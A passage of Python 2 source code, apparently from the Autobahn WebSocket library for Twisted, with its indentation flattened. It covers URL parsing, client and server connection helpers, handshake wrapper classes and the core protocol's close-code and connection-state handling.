raise Exception("invalid WebSocket URL: non-empty fragment '%s" % parsed.fragment)
if parsed.path is not None and parsed.path != "":
ppath = parsed.path
path = urllib.unquote(ppath)
else:
ppath = "/"
path = ppath
if parsed.query is not None and parsed.query != "":
resource = ppath + "?" + parsed.query
params = urlparse.parse_qs(parsed.query)
else:
resource = ppath
params = {}
return (parsed.scheme == "wss", parsed.hostname, port, resource, path, params)
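## Illustrative sketch (not part of the original Autobahn API): parse a made-up
## WebSocket URL into its components.
def _exampleParseWsUrl():
   """
   Returns (False, "localhost", 9000, "/chat?token=abc", "/chat", {"token": ["abc"]}).
   """
   return parseWsUrl("ws://localhost:9000/chat?token=abc")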
def connectWS(factory, contextFactory = None, timeout = 30, bindAddress = None):
"""
Establish WebSockets connection to a server. The connection parameters like target
host, port, resource and others are provided via the factory.
:param factory: The WebSockets protocol factory to be used for creating client protocol instances.
:type factory: An :class:`autobahn.websocket.WebSocketClientFactory` instance.
:param contextFactory: SSL context factory, required for secure WebSockets connections ("wss").
:type contextFactory: A twisted.internet.ssl.ClientContextFactory instance.
:param timeout: Number of seconds to wait before assuming the connection has failed.
:type timeout: int
:param bindAddress: A (host, port) tuple of local address to bind to, or None.
:type bindAddress: tuple
:returns: obj -- An object which provides twisted.interface.IConnector.
"""
if factory.isSecure:
if contextFactory is None:
# create default client SSL context factory when none given
from twisted.internet import ssl
contextFactory = ssl.ClientContextFactory()
conn = reactor.connectSSL(factory.host, factory.port, factory, contextFactory, timeout, bindAddress)
else:
conn = reactor.connectTCP(factory.host, factory.port, factory, timeout, bindAddress)
return conn
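## Typical client-side usage sketch (illustrative only; EchoClientProtocol stands in
## for some WebSocketClientProtocol subclass and is not defined in this excerpt):
##
##   factory = WebSocketClientFactory("ws://localhost:9000")
##   factory.protocol = EchoClientProtocol
##   connectWS(factory)
##   reactor.run()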
def listenWS(factory, contextFactory = None, backlog = 50, interface = ''):
"""
Listen for incoming WebSocket connections from clients. The connection parameters like
listening port and others are provided via the factory.
:param factory: The WebSockets protocol factory to be used for creating server protocol instances.
:type factory: An :class:`autobahn.websocket.WebSocketServerFactory` instance.
:param contextFactory: SSL context factory, required for secure WebSockets connections ("wss").
:type contextFactory: A twisted.internet.ssl.ContextFactory.
:param backlog: Size of the listen queue.
:type backlog: int
:param interface: The interface (derived from hostname given) to bind to, defaults to '' (all).
:type interface: str
:returns: obj -- An object that provides twisted.interface.IListeningPort.
"""
if factory.isSecure:
if contextFactory is None:
raise Exception("Secure WebSocket listen requested, but no SSL context factory given")
listener = reactor.listenSSL(factory.port, factory, contextFactory, backlog, interface)
else:
listener = reactor.listenTCP(factory.port, factory, backlog, interface)
return listener
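## Typical server-side usage sketch (illustrative only; EchoServerProtocol stands in
## for some WebSocketServerProtocol subclass and is not defined in this excerpt):
##
##   factory = WebSocketServerFactory("ws://localhost:9000")
##   factory.protocol = EchoServerProtocol
##   listenWS(factory)
##   reactor.run()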
class FrameHeader:
"""
Thin-wrapper for storing WebSockets frame metadata.
FOR INTERNAL USE ONLY!
"""
def __init__(self, opcode, fin, rsv, length, mask):
"""
Constructor.
:param opcode: Frame opcode (0-15).
:type opcode: int
:param fin: Frame FIN flag.
:type fin: bool
:param rsv: Frame reserved flags (0-7).
:type rsv: int
:param length: Frame payload length.
:type length: int
:param mask: Frame mask (binary string) or None.
:type mask: str
"""
self.opcode = opcode
self.fin = fin
self.rsv = rsv
self.length = length
self.mask = mask
class HttpException():
"""
Throw an instance of this class to deny a WebSockets connection
during handshake in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect`.
You can find definitions of HTTP status codes in module :mod:`autobahn.httpstatus`.
"""
def __init__(self, code, reason):
"""
Constructor.
:param code: HTTP error code.
:type code: int
:param reason: HTTP error reason.
:type reason: str
"""
self.code = code
self.reason = reason
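## Illustrative sketch (not part of this module): denying a connection during the
## opening handshake from a server protocol's onConnect() hook.
##
##   def onConnect(self, connectionRequest):
##      if "authorization" not in connectionRequest.headers:
##         raise HttpException(401, "not authorized")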
class ConnectionRequest():
"""
Thin-wrapper for WebSockets connection request information
provided in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect` when a WebSockets
client establishes a connection to a WebSockets server.
"""
def __init__(self, peer, peerstr, headers, host, path, params, version, origin, protocols, extensions):
"""
Constructor.
:param peer: IP address/port of the connecting client.
:type peer: object
:param peerstr: IP address/port of the connecting client as string.
:type peerstr: str
:param headers: HTTP headers from opening handshake request.
:type headers: dict
:param host: Host from opening handshake HTTP header.
:type host: str
:param path: Path from requested HTTP resource URI. For example, a resource URI of "/myservice?foo=23&foo=66&bar=2" will be parsed to "/myservice".
:type path: str
:param params: Query parameters (if any) from requested HTTP resource URI. For example, a resource URI of "/myservice?foo=23&foo=66&bar=2" will be parsed to {'foo': ['23', '66'], 'bar': ['2']}.
:type params: dict of arrays of strings
:param version: The WebSockets protocol version the client announced (and will be spoken, when connection is accepted).
:type version: int
      :param origin: The WebSockets origin header or None. Note that this is only a reliable source of information for browser clients!
:type origin: str
:param protocols: The WebSockets (sub)protocols the client announced. You must select and return one of those (or None) in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect`.
:type protocols: array of strings
:param extensions: The WebSockets extensions the client requested and the server accepted (and thus will be spoken, when WS connection is established).
:type extensions: array of strings
"""
self.peer = peer
self.peerstr = peerstr
self.headers = headers
self.host = host
self.path = path
self.params = params
self.version = version
self.origin = origin
self.protocols = protocols
self.extensions = extensions
class ConnectionResponse():
"""
Thin-wrapper for WebSockets connection response information
provided in :meth:`autobahn.websocket.WebSocketClientProtocol.onConnect` when a WebSockets
client has established a connection to a WebSockets server.
"""
def __init__(self, peer, peerstr, headers, version, protocol, extensions):
"""
Constructor.
:param peer: IP address/port of the connected server.
:type peer: object
:param peerstr: IP address/port of the connected server as string.
:type peerstr: str
:param headers: HTTP headers from opening handshake response.
:type headers: dict
:param version: The WebSockets protocol version that is spoken.
:type version: int
:param protocol: The WebSockets (sub)protocol in use.
:type protocol: str
:param extensions: The WebSockets extensions in use.
:type extensions: array of strings
"""
self.peer = peer
self.peerstr = peerstr
self.headers = headers
self.version = version
self.protocol = protocol
self.extensions = extensions
def parseHttpHeader(data):
"""
   Parses the beginning of an HTTP request header (the data up to the \n\n line) into a tuple
   of HTTP status line, a dictionary of HTTP headers and a dictionary of header occurrence counts.
Header keys are normalized to all-lower-case.
FOR INTERNAL USE ONLY!
:param data: The HTTP header data up to the \n\n line.
:type data: str
"""
raw = data.splitlines()
http_status_line = raw[0].strip()
http_headers = {}
http_headers_cnt = {}
for h in raw[1:]:
i = h.find(":")
if i > 0:
## HTTP header keys are case-insensitive
key = h[:i].strip().lower()
## not sure if UTF-8 is allowed for HTTP header values..
value = h[i+1:].strip().decode("utf-8")
## handle HTTP headers split across multiple lines
if http_headers.has_key(key):
http_headers[key] += ", %s" % value
http_headers_cnt[key] += 1
else:
http_headers[key] = value
http_headers_cnt[key] = 1
else:
# skip bad HTTP header
pass
return (http_status_line, http_headers, http_headers_cnt)
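## Illustrative example (not part of the module): for a request prefix such as
##
##   "GET /chat HTTP/1.1\r\nHost: example.com\r\nUpgrade: websocket\r\n"
##
## parseHttpHeader() returns the status line "GET /chat HTTP/1.1", a headers
## dictionary {"host": "example.com", "upgrade": "websocket"} and an occurrence
## count dictionary {"host": 1, "upgrade": 1}.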
class WebSocketProtocol(protocol.Protocol):
"""
   A Twisted Protocol class for WebSockets. This class is used by both the WebSocket
   client and server protocol implementations. It is unusable standalone; for example,
   the WebSockets initial handshake is implemented differently for clients and servers
   in derived classes.
"""
SUPPORTED_SPEC_VERSIONS = [0, 10, 11, 12, 13, 14, 15, 16, 17, 18]
"""
WebSockets protocol spec (draft) versions supported by this implementation.
Use of version 18 indicates RFC6455. Use of versions < 18 indicate actual
draft spec versions (Hybi-Drafts). Use of version 0 indicates Hixie-76.
"""
SUPPORTED_PROTOCOL_VERSIONS = [0, 8, 13]
"""
WebSocket protocol versions supported by this implementation. For Hixie-76,
there is no protocol version announced in HTTP header, and we just use the
draft version (0) in this case.
"""
SPEC_TO_PROTOCOL_VERSION = {0: 0, 10: 8, 11: 8, 12: 8, 13: 13, 14: 13, 15: 13, 16: 13, 17: 13, 18: 13}
"""
Mapping from protocol spec (draft) version to protocol version. For Hixie-76,
there is no protocol version announced in HTTP header, and we just use the
pseudo protocol version 0 in this case.
"""
PROTOCOL_TO_SPEC_VERSION = {0: 0, 8: 12, 13: 18}
"""
Mapping from protocol version to the latest protocol spec (draft) version
using that protocol version. For Hixie-76, there is no protocol version
announced in HTTP header, and we just use the draft version (0) in this case.
"""
DEFAULT_SPEC_VERSION = 10
"""
Default WebSockets protocol spec version this implementation speaks.
We use Hybi-10, since this is what is currently targeted by widely distributed
browsers (namely Firefox 8 and the like).
"""
DEFAULT_ALLOW_HIXIE76 = False
"""
By default, this implementation will not allow to speak the obsoleted
Hixie-76 protocol version. That protocol version has security issues, but
is still spoken by some clients. Enable at your own risk! Enabling can be
done by using setProtocolOptions() on the factories for clients and servers.
"""
WS_MAGIC = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
"""
   Protocol defined magic used during WebSocket handshake (used in Hybi-drafts
   and final RFC6455).
"""
QUEUED_WRITE_DELAY = 0.00001
"""For synched/chopped writes, this is the reactor reentry delay in seconds."""
PAYLOAD_LEN_XOR_BREAKEVEN = 128
"""Tuning parameter which chooses XORer used for masking/unmasking based on
payload length."""
MESSAGE_TYPE_TEXT = 1
"""WebSockets text message type (UTF-8 payload)."""
MESSAGE_TYPE_BINARY = 2
"""WebSockets binary message type (arbitrary binary payload)."""
## WebSockets protocol state:
## STATE_CONNECTING => STATE_OPEN => STATE_CLOSING => STATE_CLOSED
##
STATE_CLOSED = 0
STATE_CONNECTING = 1
STATE_CLOSING = 2
STATE_OPEN = 3
## Streaming Send State
SEND_STATE_GROUND = 0
SEND_STATE_MESSAGE_BEGIN = 1
SEND_STATE_INSIDE_MESSAGE = 2
SEND_STATE_INSIDE_MESSAGE_FRAME = 3
## WebSockets protocol close codes
##
CLOSE_STATUS_CODE_NORMAL = 1000
"""Normal close of connection."""
CLOSE_STATUS_CODE_GOING_AWAY = 1001
"""Going away."""
CLOSE_STATUS_CODE_PROTOCOL_ERROR = 1002
"""Protocol error."""
CLOSE_STATUS_CODE_UNSUPPORTED_DATA = 1003
"""Unsupported data."""
CLOSE_STATUS_CODE_RESERVED1 = 1004
"""RESERVED"""
CLOSE_STATUS_CODE_NULL = 1005 # MUST NOT be set in close frame!
"""No status received. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODE_ABNORMAL_CLOSE = 1006 # MUST NOT be set in close frame!
"""Abnormal close of connection. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODE_INVALID_PAYLOAD = 1007
"""Invalid frame payload data."""
CLOSE_STATUS_CODE_POLICY_VIOLATION = 1008
"""Policy violation."""
CLOSE_STATUS_CODE_MESSAGE_TOO_BIG = 1009
"""Message too big."""
CLOSE_STATUS_CODE_MANDATORY_EXTENSION = 1010
"""Mandatory extension."""
CLOSE_STATUS_CODE_INTERNAL_ERROR = 1011
"""The peer encountered an unexpected condition or internal error."""
CLOSE_STATUS_CODE_TLS_HANDSHAKE_FAILED = 1015 # MUST NOT be set in close frame!
"""TLS handshake failed, i.e. server certificate could not be verified. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODES_ALLOWED = [CLOSE_STATUS_CODE_NORMAL,
CLOSE_STATUS_CODE_GOING_AWAY,
CLOSE_STATUS_CODE_PROTOCOL_ERROR,
CLOSE_STATUS_CODE_UNSUPPORTED_DATA,
CLOSE_STATUS_CODE_INVALID_PAYLOAD,
CLOSE_STATUS_CODE_POLICY_VIOLATION,
CLOSE_STATUS_CODE_MESSAGE_TOO_BIG,
CLOSE_STATUS_CODE_MANDATORY_EXTENSION,
CLOSE_STATUS_CODE_INTERNAL_ERROR]
"""Status codes allowed to send in close."""
def onOpen(self):
"""
Callback when initial WebSockets handshake was completed. Now you may send messages.
Default implementation does nothing. Override in derived class.
Modes: Hybi, Hixie
"""
if self.debugCodePaths:
log.msg("WebSocketProtocol.onOpen")
def onMessageBegin(self, opcode):
"""
Callback when receiving a new message has begun. Default implementation will
prepare to buffer message frames. Override in derived class.
Modes: Hybi, Hixie
:param opcode: Opcode of message.
:type opcode: int
"""
self.message_opcode = opcode
self.message_data = []
self.message_data_total_length = 0
def onMessageFrameBegin(self, length, reserved):
"""
Callback when receiving a new message frame has begun. Default implementation will
prepare to buffer message frame data. Override in derived class.
Modes: Hybi
:param length: Payload length of message frame which is to be received.
:type length: int
:param reserved: Reserved bits set in frame (an integer from 0 to 7).
:type reserved: int
"""
if not self.failedByMe:
self.message_data_total_length += length
if self.maxMessagePayloadSize > 0 and self.message_data_total_length > self.maxMessagePayloadSize:
self.wasMaxMessagePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_MESSAGE_TOO_BIG, "message exceeds payload limit of %d octets" % self.maxMessagePayloadSize)
elif self.maxFramePayloadSize > 0 and length > self.maxFramePayloadSize:
self.wasMaxFramePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_POLICY_VIOLATION, "frame exceeds payload limit of %d octets" % self.maxFramePayloadSize)
else:
self.frame_length = length
self.frame_reserved = reserved
self.frame_data = []
def onMessageFrameData(self, payload):
"""
      Callback when receiving data within a message frame. Default implementation will
buffer data for frame. Override in derived class.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
:param payload: Partial payload for message frame.
:type payload: str
"""
if not self.failedByMe:
if self.websocket_version == 0:
self.message_data_total_length += len(payload)
if self.maxMessagePayloadSize > 0 and self.message_data_total_length > self.maxMessagePayloadSize:
self.wasMaxMessagePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_MESSAGE_TOO_BIG, "message exceeds payload limit of %d octets" % self.maxMessagePayloadSize)
self.message_data.append(payload)
else:
self.frame_data.append(payload)
def onMessageFrameEnd(self):
"""
Callback when a message frame has been completely received. Default implementation
will flatten the buffered frame data and callback onMessageFrame. Override
in derived class.
Modes: Hybi
"""
if not self.failedByMe:
self.onMessageFrame(self.frame_data, self.frame_reserved)
self.frame_data = None
def onMessageFrame(self, payload, reserved):
"""
Callback fired when complete message frame has been received. Default implementation
will buffer frame for message. Override in derived class.
Modes: Hybi
:param payload: Message frame payload.
:type payload: list of str
:param reserved: Reserved bits set in frame (an integer from 0 to 7).
:type reserved: int
"""
if not self.failedByMe:
self.message_data.extend(payload)
def onMessageEnd(self):
"""
Callback when a message has been completely received. Default implementation
will flatten the buffered frames and callback onMessage. Override
in derived class.
Modes: Hybi, Hixie
"""
if not self.failedByMe:
payload = ''.join(self.message_data)
self.onMessage(payload, self.message_opcode == WebSocketProtocol.MESSAGE_TYPE_BINARY)
self.message_data = None
def onMessage(self, payload, binary):
"""
Callback when a complete message was received. Default implementation does nothing.
Override in derived class.
Modes: Hybi, Hixie
:param payload: Message payload (UTF-8 encoded text string or binary string). Can also be an empty string, when message contained no payload.
:type payload: str
:param binary: If True, payload is binary, otherwise text.
:type binary: bool
"""
if self.debug:
log.msg("WebSocketProtocol.onMessage")
def onPing(self, payload):
"""
Callback when Ping was received. Default implementation responds
with a Pong. Override in derived class.
Modes: Hybi
:param payload: Payload of Ping, when there was any. Can be arbitrary, up to 125 octets.
:type payload: str
"""
if self.debug:
log.msg("WebSocketProtocol.onPing")
if self.state == WebSocketProtocol.STATE_OPEN:
self.sendPong(payload)
def onPong(self, payload):
"""
Callback when Pong was received. Default implementation does nothing.
Override in derived class.
Modes: Hybi
:param payload: Payload of Pong, when there was any. Can be arbitrary, up to 125 octets.
"""
if self.debug:
log.msg("WebSocketProtocol.onPong")
def onClose(self, wasClean, code, reason):
"""
Callback when the connection has been closed. Override in derived class.
Modes: Hybi, Hixie
:param wasClean: True, iff the connection was closed cleanly.
:type wasClean: bool
:param code: None or close status code (sent by peer), if there was one (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_*).
:type code: int
      :param reason: None or close reason (sent by peer) (when present, a status code MUST also have been present).
:type reason: str
"""
if self.debugCodePaths:
s = "WebSocketProtocol.onClose:\n"
s += "wasClean=%s\n" % wasClean
s += "code=%s\n" % code
s += "reason=%s\n" % reason
s += "self.closedByMe=%s\n" % self.closedByMe
s += "self.failedByMe=%s\n" % self.failedByMe
s += "self.droppedByMe=%s\n" % self.droppedByMe
s += "self.wasClean=%s\n" % self.wasClean
s += "self.wasNotCleanReason=%s\n" % self.wasNotCleanReason
s += "self.localCloseCode=%s\n" % self.localCloseCode
s += "self.localCloseReason=%s\n" % self.localCloseReason
s += "self.remoteCloseCode=%s\n" % self.remoteCloseCode
s += "self.remoteCloseReason=%s\n" % self.remoteCloseReason
log.msg(s)
def onCloseFrame(self, code, reasonRaw):
"""
Callback when a Close frame was received. The default implementation answers by
sending a Close when no Close was sent before. Otherwise it drops
the TCP connection either immediately (when we are a server) or after a timeout
(when we are a client and expect the server to drop the TCP).
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
- For Hixie mode, code and reasonRaw are silently ignored.
:param code: None or close status code, if there was one (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_*).
:type code: int
      :param reason: None or close reason (when present, a status code MUST also have been present).
:type reason: str
"""
if self.debugCodePaths:
log.msg("WebSocketProtocol.onCloseFrame")
self.remoteCloseCode = code
self.remoteCloseReason = reasonRaw
## reserved close codes: 0-999, 1004, 1005, 1006, 1011-2999, >= 5000
##
if code is not None and (code < 1000 or (code >= 1000 and code <= 2999 and code not in WebSocketProtocol.CLOSE_STATUS_CODES_ALLOWED) or code >= 5000):
if self.protocolViolation("invalid close code %d" % code):
return True
## closing reason
##
if reasonRaw is not None:
## we use our own UTF-8 validator to get consistent and fully conformant
## UTF-8 validation behavior
u = Utf8Validator()
val = u.validate(reasonRaw)
if not val[0]:
if self.invalidPayload("invalid close reason (non-UTF-8 payload)"):
return True
if self.state == WebSocketProtocol.STATE_CLOSING:
## We already initiated the closing handshake, so this
## is the peer's reply to our close frame.
self.wasClean = True
if self.isServer:
## When we are a server, we immediately drop the TCP.
self.dropConnection(abort = True)
else:
## When we are a client, the server should drop the TCP
## If that doesn't happen, we do. And that will set wasClean = False.
reactor.callLater(self.serverConnectionDropTimeout, self.onServerConnectionDropTimeout)
elif self.state == WebSocketProtocol.STATE_OPEN:
## The peer initiates a closing handshake, so we reply
## by sending close frame.
self.wasClean = True
if self.websocket_version == 0:
self.sendCloseFrame(isReply = True)
else:
## Either reply with same code/reason, or code == NORMAL/reason=None
if self.echoCloseCodeReason:
self.sendCloseFrame(code = code, reasonUtf8 = reason.encode("UTF-8"), isReply = True)
else:
self.sendCloseFrame(code = WebSocketProtocol.CLOSE_STATUS_CODE_NORMAL, isReply = True)
if self.isServer:
## When we are a server, we immediately drop the TCP.
self.dropConnection(abort = False)
else:
## When we are a client, we expect the server to drop the TCP,
## and when the server fails to do so, a timeout in sendCloseFrame()
## will set wasClean = False back again.
pass
else:
## STATE_CONNECTING, STATE_CLOSED
raise Exception("logic error")
def onServerConnectionDropTimeout(self):
"""
      We (a client) expected the peer (a server) to drop the connection,
      but it didn't do so within self.serverConnectionDropTimeout seconds.
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("onServerConnectionDropTimeout")
self.wasClean = False
self.wasNotCleanReason = "server did not drop TCP connection (in time)"
self.wasServerConnectionDropTimeout = True
self.dropConnection(abort = True)
else:
if self.debugCodePaths:
log.msg("skipping onServerConnectionDropTimeout since connection is already closed")
def onOpenHandshakeTimeout(self):
"""
      We expected the peer to complete the opening handshake with us.
      It didn't do so within self.openHandshakeTimeout seconds.
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
if self.state == WebSocketProtocol.STATE_CONNECTING:
if self.debugCodePaths:
log.msg("onOpenHandshakeTimeout fired")
self.wasClean = False
self.wasNotCleanReason = "peer did not finish (in time) the opening handshake"
self.wasOpenHandshakeTimeout = True
self.dropConnection(abort = True)
elif self.state == WebSocketProtocol.STATE_OPEN:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection is open (opening handshake already finished)")
elif self.state == WebSocketProtocol.STATE_CLOSING:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection is closing")
elif self.state == WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection already closed")
else:
# should not arrive here
raise Exception("logic error")
def onCloseHandshakeTimeout(self):
"""
      We initiated a closing handshake and expected the peer to respond. It didn't
      respond with a close response frame within self.closeHandshakeTimeout seconds though.
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("onCloseHandshakeTimeout fired")
self.wasClean = False
self.wasNotCleanReason = "peer did not respond (in time) in closing handshake"
self.wasCloseHandshakeTimeout = True
self.dropConnection(abort = True)
else:
if self.debugCodePaths:
log.msg("skipping onCloseHandshakeTimeout since connection is already closed")
def dropConnection(self, abort = False):
"""
Drop the underlying TCP connection. For abort parameter, see:
* http://twistedmatrix.com/documents/current/core/howto/servers.html#auto2
* https://github.com/tavendo/AutobahnPython/issues/96
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("dropping connection")
self.droppedByMe = True
self.state = WebSocketProtocol.STATE_CLOSED
if False or abort:
self.transport.abortConnection()
else:
self.transport.loseConnection()
else:
if self.debugCodePaths:
log.msg("skipping dropConnection since connection is already closed")
def failConnection(self, code = CLOSE_STATUS_CODE_GOING_AWAY, reason = "Going Away"):
"""
Fails the WebSockets connection.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, the code and reason are silently ignored.
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("Failing connection : %s - %s" % (code, reason))
self.failedByMe = True
if self.failByDrop:
## brutally drop the TCP connection
self.wasClean = False
self.wasNotCleanReason = "I failed the WebSocket connection by dropping the TCP connection"
self.dropConnection(abort = True)
else:
## perform WebSockets closing handshake
if self.state != WebSocketProtocol.STATE_CLOSING:
self.sendCloseFrame(code = code, reasonUtf8 = reason.encode("UTF-8"), isReply = False)
else:
if self.debugCodePaths:
log.msg("skipping failConnection since connection is already closing")
else:
if self.debugCodePaths:
log.msg("skipping failConnection since connection is already closed")
def protocolViolation(self, reason):
"""
Fired when a WebSockets protocol violation/error occurs.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, reason is silently ignored.
:param reason: Protocol violation that was encountered (human readable).
:type reason: str
:returns: bool -- True, when any further processing should be discontinued.
"""
if self.debugCodePaths:
log.msg("Protocol violation : %s" % reason)
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_PROTOCOL_ERROR, reason)
if self.failByDrop:
return True
else:
## if we don't immediately drop the TCP, we need to skip the invalid frame
## to continue to later receive the closing handshake reply
return False
def invalidPayload(self, reason):
"""
      Fired when an invalid payload is encountered. Currently, this only happens
      for text messages whose payload is invalid UTF-8, or for close frames whose
      close reason is invalid UTF-8.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, reason is silently ignored.
:param reason: What was invalid for the payload (human readable).
:type reason: str
:returns: bool -- True, when any further processing should be discontinued.
"""
if self.debugCodePaths:
log.msg("Invalid payload : %s" % reason)
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_INVALID_PAYLOAD, reason)
if self.failByDrop:
return True
else:
## if we don't immediately drop the TCP, we need to skip the invalid frame
## to continue to later receive the closing handshake reply
return False
def connectionMade(self):
"""
      This is called by the Twisted framework when a new TCP connection has been established
and handed over to a Protocol instance (an instance of this class).
Modes: Hybi, Hixie
"""
      ## copy default options from factory (so we are not affected by changes to those)
##
self.debug = self.factory.debug
self.debugCodePaths = self.factory.debugCodePaths
self.logOctets = self.factory.logOctets
self.logFrames = self.factory.logFrames
self.allowHixie76 = self.factory.allowHixie76
self.utf8validateIncoming = self.factory.utf8validateIncoming
self.applyMask = self.factory.applyMask
self.maxFramePayloadSize = self.factory.maxFramePayloadSize
self.maxMessagePayloadSize = self.factory.maxMessagePayloadSize
self.autoFragmentSize = self.factory.autoFragmentSize
self.failByDrop = self.factory.failByDrop
self.echoCloseCodeReason = self.factory.echoCloseCodeReason
self.openHandshakeTimeout = self.factory.openHandshakeTimeout
self.closeHandshakeTimeout = self.factory.closeHandshakeTimeout
self.tcpNoDelay = self.factory.tcpNoDelay
if self.isServer:
self.versions = self.factory.versions
self.webStatus = self.factory.webStatus
self.requireMaskedClientFrames = self.factory.requireMaskedClientFrames
self.maskServerFrames = self.factory.maskServerFrames
else:
self.version = self.factory.version
self.acceptMaskedServerFrames = self.factory.acceptMaskedServerFrames
self.maskClientFrames = self.factory.maskClientFrames
self.serverConnectionDropTimeout = self.factory.serverConnectionDropTimeout
## Set "Nagle"
self.transport.setTcpNoDelay(self.tcpNoDelay)
## the peer we are connected to
self.peer = self.transport.getPeer()
self.peerstr = "%s:%d" % (self.peer.host, self.peer.port)
## initial state
self.state = WebSocketProtocol.STATE_CONNECTING
self.send_state = WebSocketProtocol.SEND_STATE_GROUND
self.data = ""
## for chopped/synched sends, we need to queue to maintain
## ordering when recalling the reactor to actually "force"
## the octets to wire (see test/trickling in the repo)
self.send_queue = deque()
self.triggered = False
## incremental UTF8 validator
self.utf8validator = Utf8Validator()
## track when frame/message payload sizes (incoming) were exceeded
self.wasMaxFramePayloadSizeExceeded = False
self.wasMaxMessagePayloadSizeExceeded = False
## the following vars are related to connection close handling/tracking
# True, iff I have initiated closing HS (that is, did send close first)
self.closedByMe = False
# True, iff I have failed the WS connection (i.e. due to protocol error)
# Failing can be either by initiating close HS or brutal drop (this is
# controlled by failByDrop option)
self.failedByMe = False
# True, iff I dropped the TCP connection (called transport.loseConnection())
self.droppedByMe = False
# True, iff full WebSockets closing handshake was performed (close frame sent
# and received) _and_ the server dropped the TCP (which is its responsibility)
self.wasClean = False
# When self.wasClean = False, the reason (what happened)
self.wasNotCleanReason = None
# When we are a client, and we expected the server to drop the TCP, but that
# didn't happen in time, this gets True
self.wasServerConnectionDropTimeout = False
# When the initial WebSocket opening handshake times out, this gets True
self.wasOpenHandshakeTimeout = False
# When we initiated a closing handshake, but the peer did not respond in
# time, this gets True
self.wasCloseHandshakeTimeout = False
# The close code I sent in close frame (if any)
self.localCloseCode = None
# The close reason I sent in close frame (if any)
self.localCloseReason = None
# The close code the peer sent me in close frame (if any)
self.remoteCloseCode = None
# The close reason the peer sent me in close frame (if any)
self.remoteCloseReason = None
# set opening handshake timeout handler
if self.openHandshakeTimeout > 0:
reactor.callLater(self.openHandshakeTimeout, self.onOpenHandshakeTimeout)
def connectionLost(self, reason):
"""
      This is called by the Twisted framework when a TCP connection was lost.
Modes: Hybi, Hixie
"""
self.state = WebSocketProtocol.STATE_CLOSED
if not self.wasClean:
if not self.droppedByMe and self.wasNotCleanReason is None:
self.wasNotCleanReason = "peer dropped the TCP connection without previous WebSocket closing handshake"
self.onClose(self.wasClean, WebSocketProtocol.CLOSE_STATUS_CODE_ABNORMAL_CLOSE, "connection was closed uncleanly (%s)" % self.wasNotCleanReason)
else:
self.onClose(self.wasClean, self.remoteCloseCode, self.remoteCloseReason)
def logRxOctets(self, data):
"""
Hook fired right after raw octets have been received, but only when self.logOctets == True.
Modes: Hybi, Hixie
"""
log.msg("RX Octets from %s : octets = %s" % (self.peerstr, binascii.b2a_hex(data)))
def logTxOctets(self, data, sync):
"""
Hook fired right after raw octets have been sent, but only when self.logOctets == True.
Modes: Hybi, Hixie
"""
log.msg("TX Octets to %s : sync = %s, octets = %s" % (self.peerstr, sync, binascii.b2a_hex(data)))
def logRxFrame(self, frameHeader, payload):
"""
Hook fired right after WebSocket frame has been received and decoded, but only when self.logFrames == True.
Modes: Hybi
"""
data = ''.join(payload)
info = (self.peerstr,
frameHeader.fin,
frameHeader.rsv,
frameHeader.opcode,
binascii.b2a_hex(frameHeader.mask) if frameHeader.mask else "-",
frameHeader.length,
data if frameHeader.opcode == 1 else binascii.b2a_hex(data))
log.msg("RX Frame from %s : fin = %s, rsv = %s, opcode = %s, mask = %s, length = %s, payload = %s" % info)
def logTxFrame(self, frameHeader, payload, repeatLength, chopsize, sync):
"""
Hook fired right after WebSocket frame has been encoded and sent, but only when self.logFrames == True.
Modes: Hybi
"""
info = (self.peerstr,
frameHeader.fin,
frameHeader.rsv,
frameHeader.opcode,
binascii.b2a_hex(frameHeader.mask) if frameHeader.mask else "-",
frameHeader.length,
repeatLength,
chopsize,
sync,
payload if frameHeader.opcode == 1 else binascii.b2a_hex(payload))
log.msg("TX Frame to %s : fin = %s, rsv = %s, opcode = %s, mask = %s, length = %s, repeat_length = %s, chopsize = %s, sync = %s, payload = %s" % info)
def dataReceived(self, data):
"""
      This is called by the Twisted framework upon receiving data on the TCP connection.
Modes: Hybi, Hixie
"""
if self.logOctets:
self.logRxOctets(data)
self.data += data
self.consumeData()
def consumeData(self):
"""
Consume buffered (incoming) data.
Modes: Hybi, Hixie
"""
## WebSocket is open (handshake was completed) or close was sent
##
if self.state == WebSocketProtocol.STATE_OPEN or self.state == WebSocketProtocol.STATE_CLOSING:
## process until no more buffered data left or WS was closed
##
while self.processData() and self.state != WebSocketProtocol.STATE_CLOSED:
pass
## WebSocket needs handshake
##
elif self.state == WebSocketProtocol.STATE_CONNECTING:
## the implementation of processHandshake() in derived
## class needs to perform client or server handshake
## from other party here ..
